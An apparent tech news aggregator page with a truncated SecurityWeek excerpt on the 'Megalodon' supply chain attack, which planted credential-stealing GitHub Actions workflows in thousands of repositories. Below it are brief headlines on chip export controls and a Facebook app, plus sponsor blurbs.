TECH NEWS

Over 5,500 GitHub Repositories Infected in ‘Megalodon’ Supply Chain Attack

https://www.securityweek.com/wp-content/uploads/2024/03/GitHub.jpeg

More than 5,500 GitHub repositories were infected with malware in a supply chain attack that relies on automated commits, security researchers warn.

The campaign, dubbed Megalodon, relies on GitHub Actions workflows containing a payload designed to steal credentials, keys, tokens, and other secrets.

The workflows, SafeDep says, were injected through over 5,700 malicious commits pushed to the impacted repositories within a six-hour window, on May 18.

According to the cybersecurity firm, the attackers deployed two payloads as part of the attack. One was designed to add a new workflow that would be triggered on every push and pull request, and another that replaced existing workflows with specific triggers, creating dormant backdoors.

On infected machines, the malware would exfiltrate all CI environment variables, AWS credentials, GCP access tokens, Azure credentials, SSH private keys, Docker and Kubernetes configurations, API keys, database connection strings, GitHub Actions tokens, GitLab CI/CD tokens, and dozens of...

Copyright of this story solely belongs to securityweek.com. To see the full text click HERE

Read more

https://assets.bwbx.io/images/users/iqjWHBFdfxIU/inuOby8YIcbY/v1/1200x800.jpg

The Netherlands is lobbying the US not to expand chip equipment export controls that would constrain ASML's ability to sell immersion DUV machines to China

Sponsor Posts Fast, affordable law for startups — Soxton automates startup legal so founders can move faster and sleep better. We handle incorporation, advisor, employment and commercial contracts. Join the waitlist for early access! Stop vibe coding analytics — Equals AI turns questions about your business into auditable spreadsheet models and dashboards.
https://techcrunch.com/wp-content/uploads/2025/03/facebook-logo-on-phone.jpg?resize=1200,800

Facebook brings back Facebook Creator Studio as a stand-alone app with built-in AI chatbot to help creators grow their audiences through personalized guidance

Sponsor Posts Fast, affordable law for startups — Soxton automates startup legal so founders can move faster and sleep better. We handle incorporation, advisor, employment and commercial contracts. Join the waitlist for early access! Stop vibe coding analytics — Equals AI turns questions about your business into auditable spreadsheet models and dashboards.